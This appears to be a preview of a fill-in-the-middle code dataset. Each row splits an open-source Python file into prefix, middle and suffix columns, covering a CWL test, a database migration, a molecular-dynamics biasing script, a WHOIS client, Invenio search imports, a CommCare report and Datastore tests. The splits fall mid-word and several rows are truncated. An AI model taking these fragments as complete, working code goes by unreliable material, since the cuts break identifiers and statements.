prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
from io import StringIO
from pathlib import Path
from cwltool.main import main
fr | om .util import get_data
def test_empty_input(tmp_path: Path) -> None:
"""Affirm that an empty input works."""
empty_json = "{}"
empty_input = StringIO(empty_json)
params = [
"--outdir",
str(tmp_path),
get_data("tests/wf/no-parameters-echo.cwl"),
"-",
]
try:
assert main(params, stdin=empty_input) == 0
except System | Exit as err:
assert err.code == 0
|
""" Extend suppliers table with new fields (to be initially populated from declaration data)
Revision ID: 940
Revises: 930
Create Date: 2017-08-16 16:39:00.000000
"""
# revision identifiers, used by Alembic.
revision = '940'
down_revision = '930'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column(u'suppliers', sa.Column('registered_name', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_country', sa.String(), nullable=True)) |
op.add_column(u'suppliers', sa.Column('other_company_registration_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa | .Column('registration_date', sa.DateTime(), nullable=True))
op.add_column(u'suppliers', sa.Column('vat_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('organisation_size', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('trading_status', sa.String(), nullable=True))
def downgrade():
op.drop_column(u'suppliers', 'registered_name')
op.drop_column(u'suppliers', 'registration_country')
op.drop_column(u'suppliers', 'other_company_registration_number')
op.drop_column(u'suppliers', 'registration_date')
op.drop_column(u'suppliers', 'vat_number')
op.drop_column(u'suppliers', 'organisation_size')
op.drop_column(u'suppliers', 'trading_status')
|
r.add_argument("--fc_step", type=float, default=CONFIG_34, help="the value by which the force constant is increased each time (for force_constant_adjustable mode)")
parser.add_argument("--distance_tolerance", type=float, default=CONFIG_35, help="max distance allowed between center of data cloud and potential center (for force_constant_adjustable mode)")
parser.add_argument("--autoencoder_file", type=str, help="pkl file that stores autoencoder (for force_constant_adjustable mode)")
parser.add_argument("--remove_previous", help="remove previous outputs while adjusting force constants", action="store_true")
args = parser.parse_args()
record_interval = args.record_interval
total_number_of_steps = args.total_num_of_steps
input_data_type = ['cossin', 'Cartesian', 'pairwise'][args.data_type_in_input_layer]
force_constant = args.force_constant
scaling_factor = args.scaling_factor
layer_types = re.sub("\[|\]|\"|\'| ",'', args.layer_types).split(',')
num_of_nodes = re.sub("\[|\]|\"|\'| ",'', args.num_of_nodes).split(',')
num_of_nodes = [int(item) for item in num_of_nodes]
out_format = '.dcd' if args.out_traj is None else os.path.splitext(args.out_traj)[1]
if float(force_constant) != 0:
from ANN import *
folder_to_store_output_files = args.folder_to_store_output_files # this is used to separate outputs for different networks into different folders
autoencoder_info_file = args.autoencoder_info_file
potential_center = list([float(x) for x in args.pc_potential_center.replace('"','')\
.replace('pc_','').split(',')]) # this API is the generalization for higher-dimensional cases
if not os.path.exists(folder_to_store_output_files):
try: os.makedirs(folder_to_store_output_files)
except: pass
def run_simulation(force_constant):
assert(os.path.exists(folder_to_store_output_files))
input_pdb_file_of_molecule = args.starting_pdb_file
force_field_file = 'amber99sb.xml'
water_field_file = 'tip3p.xml'
pdb_reporter_file = '%s/output_fc_%f_pc_%s.pdb' %(folder_to_store_output_files, force_constant, str(potential_center).replace(' ',''))
if not args.out_traj is None:
pdb_reporter_file = args.out_traj
state_data_reporter_file = pdb_reporter_file.replace('output_fc', 'report_fc').replace('.pdb', '.txt')
# check if the file exist
for item_filename in [pdb_reporter_file, state_data_reporter_file]:
Helper_func.backup_rename_file_if_exists(item_filename)
index_of_backbone_atoms = CONFIG_57[0]
flag_random_seed = 0 # whether we need to fix this random seed
simulation_temperature = args.temperature
time_step = CONFIG_22 # simulation time step, in ps
pdb = PDBFile(input_pdb_file_of_molecule)
modeller = Modeller(pdb.topology, pdb.getPositions(frame=args.starting_frame))
solvent_opt = 'no_water'
if solvent_opt == 'explicit':
forcefield = ForceField(force_field_file, water_field_file)
modeller.addSolvent(forcefield, model=water_field_file.split('.xml')[0], boxSize=Vec3(3, 3, 3) * nanometers,
ionicStrength=0 * molar)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=PME, nonbondedCutoff=1.0 * nanometers,
constraints=AllBonds, ewaldErrorTolerance=0.0005)
else:
forcefield = ForceField(force_field_file)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=NoCutoff, constraints=AllBonds)
if args.bias_method == "US":
if float(force_constant) != 0:
force = ANN_Force()
force.set_layer_types | (layer_types)
force.set_data_type_in_input_layer(args.data_type_in_input_layer)
force.set_list_of_index_of_atoms_forming_dihedrals_from_index_of_backbone_atoms(index_of_backbone_atoms)
force.set_index_of_backbone_atoms(index_of_backbone_atoms)
if args.data_type_in_input_layer == 2:
| force.set_list_of_pair_index_for_distances(CONFIG_80)
force.set_num_of_nodes(num_of_nodes)
force.set_potential_center(potential_center)
force.set_force_constant(float(force_constant))
unit_scaling = 1.0 # TODO: check unit scaling
force.set_scaling_factor(float(scaling_factor) / unit_scaling) # since default unit is nm in OpenMM
# TODO: need to fix following for multi-hidden layer cases
temp_coeffs, temp_bias = np.load(autoencoder_info_file)
for item_layer_index in [0, 1]:
assert (len(temp_coeffs[item_layer_index]) ==
num_of_nodes[item_layer_index] * num_of_nodes[item_layer_index + 1]), (len(temp_coeffs[item_layer_index]),
(num_of_nodes[item_layer_index], num_of_nodes[item_layer_index + 1]))
assert (len(temp_bias[item_layer_index]) == num_of_nodes[item_layer_index + 1]), (len(temp_bias[item_layer_index]), num_of_nodes[item_layer_index + 1])
# need tolist() since C++ only accepts Python list
force.set_coeffients_of_connections([item_w.tolist() for item_w in temp_coeffs])
force.set_values_of_biased_nodes([item_w.tolist() for item_w in temp_bias])
system.addForce(force)
elif args.bias_method == "US_on_phipsi":
from openmmplumed import PlumedForce
kappa_string = ','.join([str(force_constant) for _ in potential_center])
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: RESTRAINT ARG=phi,psi AT=%f,%f KAPPA=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (potential_center[0], potential_center[1], kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "MTD":
from openmmplumed import PlumedForce
plumed_force_string = Alanine_dipeptide.get_expression_script_for_plumed()
with open(autoencoder_info_file, 'r') as f_in:
plumed_force_string += f_in.read()
# note that dimensionality of MTD is determined by potential_center string
plumed_script_ANN_mode = 'ANN'
if plumed_script_ANN_mode == 'native':
mtd_output_layer_string = ['l_2_out_%d' % item for item in range(len(potential_center))]
elif plumed_script_ANN_mode == 'ANN':
mtd_output_layer_string = ['ann_force.%d' % item for item in range(len(potential_center))]
else: raise Exception('mode error')
mtd_output_layer_string = ','.join(mtd_output_layer_string)
mtd_sigma_string = ','.join([str(args.MTD_sigma) for _ in range(len(potential_center))])
if args.MTD_WT:
mtd_well_tempered_string = 'TEMP=%d BIASFACTOR=%f' % (args.temperature, args.MTD_biasfactor)
else:
mtd_well_tempered_string = ""
plumed_force_string += """
metad: METAD ARG=%s PACE=%d HEIGHT=%f SIGMA=%s FILE=temp_MTD_hills.txt %s
PRINT STRIDE=%d ARG=%s,metad.bias FILE=temp_MTD_out.txt
""" % (mtd_output_layer_string, args.MTD_pace, args.MTD_height, mtd_sigma_string, mtd_well_tempered_string,
record_interval, mtd_output_layer_string)
# print plumed_force_string
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "SMD":
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '1000,1000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: MOVINGRESTRAINT ARG=phi,psi AT0=-1.5,1.0 STEP0=0 KAPPA0=%s AT1=1.0,-1.0 STEP1=%d KAPPA1=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (kappa_string, total_number_of_steps, kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "TMD": # targeted MD
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '10000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
rmsd: RMSD REFERENCE=../resources/alanine_ref_1_TMD.pdb TYPE=OPTIMAL
restraint: MOVINGRESTRAINT ARG=rmsd AT0=0 STEP0=0 KAPPA0=0 AT1=0 STEP1=%d KAPPA1 |
import socket, re, sys
from codecs import encode, decode
from . import shared
def get_whois_raw(domain, server="", previous=None, rfc3490=True, never_cut=False, with_server_list=False, server_list=None):
previous = previous or []
server_list = server_list or []
# Sometimes IANA simply won't give us the right root WHOIS server
exceptions = {
".ac.uk": "whois.ja.net",
".ps": "whois.pnina.ps",
".buzz": "whois.nic.buzz",
".moe": "whois.nic.moe",
# The following is a bit hacky, but IANA won't return the right answer for example.com because it's a direct registration.
"example.com": "whois.verisign-grs.com"
}
if rfc3490:
if sys.version_info < (3, 0):
domain = encode( domain if type(domain) is unicode else decode(domain, "utf8"), "idna" )
else:
domain = encode(domain, "idna").decode("ascii")
if len(previous) == 0 and server == "":
# Root query
is_exception = False
for exception, exc_serv in exceptions.items():
if domain.endswith(exception):
is_exception = True
target_server = exc_serv
break
if is_exception == False:
target_server = get_root_server(domain)
else:
target_server = server |
if target_server == "whois.jprs.jp":
request_domain = "%s/e" % domain # Suppress Japanese output
elif domain.endswith(".de") and ( target_server == "whois.denic.de" or target_server == "de.whois-servers.net | " ):
request_domain = "-T dn,ace %s" % domain # regional specific stuff
elif target_server == "whois.verisign-grs.com":
request_domain = "=%s" % domain # Avoid partial matches
else:
request_domain = domain
response = whois_request(request_domain, target_server)
if never_cut:
# If the caller has requested to 'never cut' responses, he will get the original response from the server (this is
# useful for callers that are only interested in the raw data). Otherwise, if the target is verisign-grs, we will
# select the data relevant to the requested domain, and discard the rest, so that in a multiple-option response the
# parsing code will only touch the information relevant to the requested domain. The side-effect of this is that
# when `never_cut` is set to False, any verisign-grs responses in the raw data will be missing header, footer, and
# alternative domain options (this is handled a few lines below, after the verisign-grs processing).
new_list = [response] + previous
if target_server == "whois.verisign-grs.com":
# VeriSign is a little... special. As it may return multiple full records and there's no way to do an exact query,
# we need to actually find the correct record in the list.
for record in response.split("\n\n"):
if re.search("Domain Name: %s\n" % domain.upper(), record):
response = record
break
if never_cut == False:
new_list = [response] + previous
server_list.append(target_server)
for line in [x.strip() for x in response.splitlines()]:
match = re.match("(refer|whois server|referral url|whois server|registrar whois):\s*([^\s]+\.[^\s]+)", line, re.IGNORECASE)
if match is not None:
referal_server = match.group(2)
if referal_server != server and "://" not in referal_server: # We want to ignore anything non-WHOIS (eg. HTTP) for now.
# Referal to another WHOIS server...
return get_whois_raw(domain, referal_server, new_list, server_list=server_list, with_server_list=with_server_list)
if with_server_list:
return (new_list, server_list)
else:
return new_list
def get_root_server(domain):
data = whois_request(domain, "whois.iana.org")
for line in [x.strip() for x in data.splitlines()]:
match = re.match("refer:\s*([^\s]+)", line)
if match is None:
continue
return match.group(1)
raise shared.WhoisException("No root WHOIS server found for domain.")
def whois_request(domain, server, port=43):
socket.setdefaulttimeout(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server, port))
sock.send(("%s\r\n" % domain).encode("utf-8"))
buff = b""
while True:
data = sock.recv(1024)
if len(data) == 0:
break
buff += data
return buff.decode("utf-8")
|
of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio Search Engine in mod_python."""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
## import general modules:
import cgi
import cStringIO
import copy
import string
import os
import re
import time
import urllib
import urlparse
import zlib
import sys
try:
## import optional module:
import numpy
CFG_NUMPY_IMPORTABLE = True
except:
CFG_NUMPY_IMPORTABLE = False
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
## import Invenio stuff:
from invenio.config import \
CFG_CERN_SITE, \
CFG_INSPIRE_SITE, \
CFG_OAI_ID_FIELD, \
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBSEARCH_CALL_BIBFORMAT, \
CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX, \
CFG_WEBSEARCH_FIELDS_CONVERT, \
CFG_WEBSEARCH_NB_RECORDS_TO_SORT, \
CFG_WEBSEARCH_SEARCH_CACHE_SIZE, \
CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT, \
CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS, \
CFG_WEBSEARCH_USE_ALEPH_SYSNOS, \
CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, \
CFG_WEBSEARCH_FULLTEXT_SNIPPETS, \
CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS, \
CFG_WEBSEARCH_WILDCARD_LIMIT, \
CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE, \
CFG_BIBUPLOAD_EXTERNAL_SYSNO_TAG, \
CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS, \
CFG_WEBSEARCH_SYNONYM_KBRS, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_LOGDIR, \
CFG_BIBFORMAT_HIDDEN_TAGS, \
CFG_SITE_URL, \
CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS, \
CFG_SOLR_URL, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
CFG_SITE_RECORD, \
CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT, \
CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY, \
CFG_BIBSORT_BUCKETS, \
CFG_XAPIAN_ENABLED, \
CFG_BIBINDEX_CHARS_PUNCTUATION
from invenio.search_engine_config import \
InvenioWebSearchUnknownCollectionError, \
InvenioWebSearchWildcardLimitError, \
CFG_WEBSEARCH_IDXPAIRS_FIELDS,\
CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH, \
CFG_SEARCH_RESULTS_CACHE_PREFIX
from invenio.search_engine_utils import get_fieldvalues, get_fieldvalues_alephseq_like
from invenio.bibrecord import create_record, record_xml_output
from invenio.bibrank_record_sorter import get_bibrank_methods, is_method_valid, rank_records as rank_records_bibrank
from invenio.bibrank_downloads_similarity import register_page_view_event, calculate_reading_similarity_list
from invenio.bibindex_engine_stemmer import stem
from invenio.bibindex_tokenizers.BibIndexDefaultTokenizer import BibIndexDefaultTokenizer
from invenio.bibindex_tokenizers.BibIndexCJKTokenizer import BibIndexCJKTokenizer, is_there_any_CJK_character_in_text
from invenio.bibindex_engine_utils import author_name_requires_phrase_search
from invenio.bibindex_engine_washer import wash_index_term, lower_index_term, wash_author_name
from invenio.bibindex_engine_config import CFG_BIBINDEX_SYNONYM_MATCH_TYPE
from invenio.bibindex_engine_utils import get_idx_indexer
from invenio.bibformat import format_record, format_records, get_output_format_content_type, create_excel
from invenio.bibformat_config import CFG_BIBFORMAT_USE_OLD_BIBFORMAT
from invenio.bibrank_downloads_grapher import create_download_history_graph_and_box
from invenio.bibknowledge import get_kbr_values
from invenio.data_cacher import DataCacher
from invenio.websearch_external_collections import prin | t_external_results_overview, perform_external_collection_search
from invenio.access_control_admin import acc_get_action_id
from invenio.access_control_config import VIEWRESTRCOLL, \
CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS, \
CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
from invenio.websearchadminlib import get_detailed_page_tabs, get_detailed_page_tabs_counts
from invenio.intbitset import intbitset
from inve | nio.dbquery import DatabaseError, deserialize_via_marshal, InvenioDbQueryWildcardLimitError
from invenio.access_control_engine import acc_authorize_action
from invenio.errorlib import register_exception
from invenio.textutils import encode_for_xml, wash_for_utf8, strip_accents
from invenio.htmlutils import get_mathjax_header
from invenio.htmlutils import nmtoken_from_string
import invenio.template
webstyle_templates = invenio.template.load('webstyle')
webcomment_templates = invenio.template.load('webcomment')
from invenio.bibrank_citation_searcher import calculate_cited_by_list, \
calculate_co_cited_with_list, get_records_with_num_cites, get_self_cited_by, \
get_refersto_hitset, get_citedby_hitset
from invenio.bibrank_citation_grapher import create_citation_history_graph_and_box
from invenio.dbquery import run_sql, run_sql_with_limit, wash_table_column_name, \
get_table_update_time
from invenio.webuser import getUid, collect_user_info, session_param_set
from invenio.webpage import pageheaderonly, pagefooteronly, create_error_box, write_warning
from invenio.messages import gettext_set_language
from invenio.search_engine_query_parser import SearchQueryParenthesisedParser, \
SpiresToInvenioSyntaxConverter
from invenio import webinterface_handler_config as apache
from invenio.solrutils_bibindex_searcher import solr_get_bitset
from invenio.xapianutils_bibindex_searcher import xapian_get_bitset
try:
import invenio.template
websearch_templates = invenio.template.load('websearch')
except:
pass
from invenio.websearch_external_collections import calculate_hosted_collections_results, do_calculate_hosted_collections_results
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH
from invenio.websearch_external_collections_config import CFG_EXTERNAL_COLLECTION_MAXRESULTS
VIEWRESTRCOLL_ID = acc_get_action_id(VIEWRESTRCOLL)
## global vars:
cfg_nb_browse_seen_records = 100 # limit of the number of records to check when browsing certain collection
cfg_nicely_ordered_collection_list = 0 # do we propose collection list nicely ordered or alphabetical?
## precompile some often-used regexp for speed reasons:
re_word = re.compile('[\s]')
re_quotes = re.compile('[\'\"]')
re_doublequote = re.compile('\"')
re_logical_and = re.compile('\sand\s', re.I)
re_logical_or = re.compile('\sor\s', re.I)
re_logical_not = re.compile('\snot\s', re.I)
re_operators = re.compile(r'\s([\+\-\|])\s')
re_pattern_wildcards_after_spaces = re.compile(r'(\s)[\*\%]+')
re_pattern_single_quotes = re.compile("'(.*?)'")
re_pattern_double_quotes = re.compile("\"(.*?)\"")
re_pattern_parens_quotes = re.compile(r'[\'\"]{1}[^\'\"]*(\([^\'\"]*\))[^\'\"]*[\'\"]{1}')
re_pattern_regexp_quotes = re.compile("\/(.*?)\/")
re_pattern_spaces_after_colon = re.compile(r'(:\s+)')
re_pattern_short_words = re.compile(r'([\s\"]\w{1,3})[\*\%]+')
re_pattern_space = re.compile("__SPACE__")
re_pattern_today = re.compile("\$TODAY\$")
re_pattern_parens = re.compile(r'\([^\)]+\s+[^\)]+\)')
re_punctuation_followed_by_space = re.compile(CFG_BIBINDEX_CHARS_PUNCTUATION + '\s')
## em possible values
EM_REPOSITORY={"body" : "B",
"header" : "H",
"footer" : "F",
"search_box" : "S",
"see_also_box" : "L",
"basket" : "K",
"alert" : "A",
"search_info" : "I",
"overview" : "O",
"all_portalboxes" : "P",
"te_portalbox" : "Pte",
"tp_portalbox" : "Ptp",
"np_portalbox" : "Pnp",
"ne_portalbox" : "Pne",
"lt_portalbox" : "Plt",
"rt_portalbox" : "Prt"};
cla |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WAR | RANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##################################################### | #########################
"""
This module contains external, potentially separately licensed,
packages that are included in spack.
So far:
argparse: We include our own version to be Python 2.6 compatible.
distro: Provides a more stable linux distribution detection.
functools: Used for implementation of total_ordering.
jinja2: A modern and designer-friendly templating language for Python
jsonschema: An implementation of JSON Schema for Python.
ordereddict: We include our own version to be Python 2.6 compatible.
py: Needed by pytest. Library with cross-python path,
ini-parsing, io, code, and log facilities.
pyqver2: External script to query required python version of
python source code. Used for ensuring 2.6 compatibility.
pytest: Testing framework used by Spack.
yaml: Used for config files.
"""
|
ngo.utils.translation import ugettext_lazy
from memoized import memoized
from corehq import privileges
from corehq.apps.accounting.models import BillingAccount
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.dispatcher import UserManagementReportDispatcher
from corehq.apps.reports.filters.users import (
ChangeActionFilter,
ChangedByUserFilter,
EnterpriseUserFilter,
)
from corehq.apps.reports.filters.users import \
ExpandedMobileWorkerFilter as EMWF
from corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin, PaginatedReportMixin
from corehq.apps.reports.standard import DatespanMixin, ProjectReport
from corehq.apps.users.audit.change_messages import (
ASSIGNED_LOCATIONS_FIELD,
CHANGE_MESSAGES_FIELDS,
DOMAIN_FIELD,
LOCATION_FIELD,
PHONE_NUMBERS_FIELD,
ROLE_FIELD,
TWO_FACTOR_FIELD,
get_messages,
)
from corehq.apps.users.models import UserHistory
from corehq.const import USER_DATETIME_FORMAT
from corehq.util.timezones.conversions import ServerTime
class UserHistoryReport(GetParamsMixin, DatespanMixin, GenericTabularReport, ProjectReport, PaginatedReportMixin):
slug = 'user_history'
name = ugettext_lazy("User History")
section_name = ugettext_lazy("User Management")
dispatcher = UserManagementReportDispatcher
fields = [
'corehq.apps.reports.filters.users.AffectedUserFilter',
'corehq.apps.reports.filters.users.ChangedBy | UserFilter',
'corehq.apps.reports.filters.dates.DatespanFilter',
'corehq.apps.reports.filters.users.ChangeActionFilter',
'corehq.apps.reports.filters.users.User | PropertyFilter',
'corehq.apps.reports.filters.users.UserUploadRecordFilter',
]
description = ugettext_lazy("History of user updates")
ajax_pagination = True
default_sort = {'changed_at': 'desc'}
@classmethod
def get_primary_properties(cls, domain):
"""
Get slugs and human-friendly names for the properties that are available
for filtering and/or displayed by default in the report, without
needing to click "See More".
"""
if domain_has_privilege(domain, privileges.APP_USER_PROFILES):
user_data_label = _("profile or user data")
else:
user_data_label = _("user data")
return {
"username": _("username"),
ROLE_FIELD: _("role"),
"email": _("email"),
DOMAIN_FIELD: _("project"),
"is_active": _("is active"),
"language": _("language"),
PHONE_NUMBERS_FIELD: _("phone numbers"),
LOCATION_FIELD: _("primary location"),
"user_data": user_data_label,
TWO_FACTOR_FIELD: _("two factor authentication disabled"),
ASSIGNED_LOCATIONS_FIELD: _("assigned locations"),
}
@property
def headers(self):
h = [
DataTablesColumn(_("Affected User"), sortable=False),
DataTablesColumn(_("Modified by User"), sortable=False),
DataTablesColumn(_("Action"), prop_name='action'),
DataTablesColumn(_("Via"), prop_name='changed_via'),
DataTablesColumn(_("Changes"), sortable=False),
DataTablesColumn(_("Change Message"), sortable=False),
DataTablesColumn(_("Timestamp"), prop_name='changed_at'),
]
return DataTablesHeader(*h)
@property
def total_records(self):
return self._get_queryset().count()
@memoized
def _get_queryset(self):
user_slugs = self.request.GET.getlist(EMWF.slug)
user_ids = self._get_user_ids(user_slugs)
# return empty queryset if no matching users were found
if user_slugs and not user_ids:
return UserHistory.objects.none()
changed_by_user_slugs = self.request.GET.getlist(ChangedByUserFilter.slug)
changed_by_user_ids = self._get_user_ids(changed_by_user_slugs)
# return empty queryset if no matching users were found
if changed_by_user_slugs and not changed_by_user_ids:
return UserHistory.objects.none()
user_property = self.request.GET.get('user_property')
actions = self.request.GET.getlist('action')
user_upload_record_id = self.request.GET.get('user_upload_record')
query = self._build_query(user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id)
return query
def _get_user_ids(self, slugs):
es_query = self._get_users_es_query(slugs)
return es_query.values_list('_id', flat=True)
def _get_users_es_query(self, slugs):
return EnterpriseUserFilter.user_es_query(
self.domain,
slugs,
self.request.couch_user,
)
def _build_query(self, user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id):
filters = Q(for_domain__in=self._for_domains())
if user_ids:
filters = filters & Q(user_id__in=user_ids)
if changed_by_user_ids:
filters = filters & Q(changed_by__in=changed_by_user_ids)
if user_property:
filters = filters & self._get_property_filters(user_property)
if actions and ChangeActionFilter.ALL not in actions:
filters = filters & Q(action__in=actions)
if user_upload_record_id:
filters = filters & Q(user_upload_record_id=user_upload_record_id)
if self.datespan:
filters = filters & Q(changed_at__lt=self.datespan.enddate_adjusted,
changed_at__gte=self.datespan.startdate)
return UserHistory.objects.filter(filters)
def _for_domains(self):
return BillingAccount.get_account_by_domain(self.domain).get_domains()
@staticmethod
def _get_property_filters(user_property):
if user_property in CHANGE_MESSAGES_FIELDS:
query_filters = Q(change_messages__has_key=user_property)
# to include CommCareUser creation from UI where a location can be assigned as a part of user creation
# which is tracked only under "changes" and not "change messages"
if user_property == LOCATION_FIELD:
query_filters = query_filters | Q(changes__has_key='location_id')
else:
query_filters = Q(changes__has_key=user_property)
return query_filters
@property
def rows(self):
records = self._get_queryset().order_by(self.ordering)[
self.pagination.start:self.pagination.start + self.pagination.count
]
for record in records:
yield self._user_history_row(record, self.domain, self.timezone)
@property
def ordering(self):
by, direction = list(self.get_sorting_block()[0].items())[0]
return '-' + by if direction == 'desc' else by
@memoized
def _get_location_name(self, location_id):
from corehq.apps.locations.models import SQLLocation
if not location_id:
return None
try:
location_object = SQLLocation.objects.get(location_id=location_id)
except ObjectDoesNotExist:
return None
return location_object.display_name
def _user_history_row(self, record, domain, timezone):
return [
record.user_repr,
record.changed_by_repr,
_get_action_display(record.action),
record.changed_via,
self._user_history_details_cell(record.changes, domain),
self._html_list(list(get_messages(record.change_messages))),
ServerTime(record.changed_at).user_time(timezone).ui_string(USER_DATETIME_FORMAT),
]
def _html_list(self, changes):
items = []
if isinstance(changes, dict):
for key, value in changes.items():
if isinstance(value, dict):
value = self._html_list(value)
elif isinstance(value, list):
value = format_html(", ".join(value))
else |
.key.project, key2.project)
self.assertEqual(ds_api.lookup.call_count, 2)
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_any_call(
self.PROJECT, [key2_pb], read_options=read_options
)
ds_api.lookup.assert_any_call(
self.PROJECT, [key1_pb, key2_pb], read_options=read_options
)
def test_get_multi_hit(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
kind = "Kind"
id_ = 1234
path = [{"kind": kind, "id": id_}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
result, = client.get_multi([key])
new_key = result.key
# Check the returned value is as expected.
self.assertIsNot(new_key, key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, path)
self.assertEqual(list(result), ["foo"])
self.assertEqual(result["foo"], "Foo")
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_hit_w_transaction(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
txn_id = b"123"
kind = "Kind"
id_ = 1234
path = [{"kind": kind, "id": id_}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
txn = client.transaction()
txn._id = txn_id
result, = client.get_multi([key], transaction=txn)
new_key = result.key
# Check the returned value is as expected.
self.assertIsNot(new_key, key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, path)
self.assertEqual(list(result), ["foo"])
self.assertEqual(result["foo"], "Foo")
read_options = datastore_pb2.ReadOptions(transaction=txn_id)
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_hit_multiple_keys_same_project(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
kind = "Kind"
id1 = 1234
id2 = 2345
# Make a found entity pb to be returned from mock backend.
entity_pb1 = _make_entity_pb(self.PROJECT, kind, id1)
entity_pb2 = _make_entity_pb(self.PROJECT, kind, id2)
# Make a connection to return the entity pbs.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb1, entity_pb2])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key1 = Key(kind, id1, project=self.PROJECT)
key2 = Key(kind, id2, project=self.PROJECT)
retrieved1, retrieved2 = client.get_multi([key1, key2])
# Check values match.
self.assertEqual(retrieved1.key.path, key1.path)
self.assertEqual(dict(retrieved1), {})
self.assertEqual(retrieved2.key.path, key2.path)
self.assertEqual(dict(retrieved2), {})
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT,
[key1.to_protobuf(), key2.to_protobuf()],
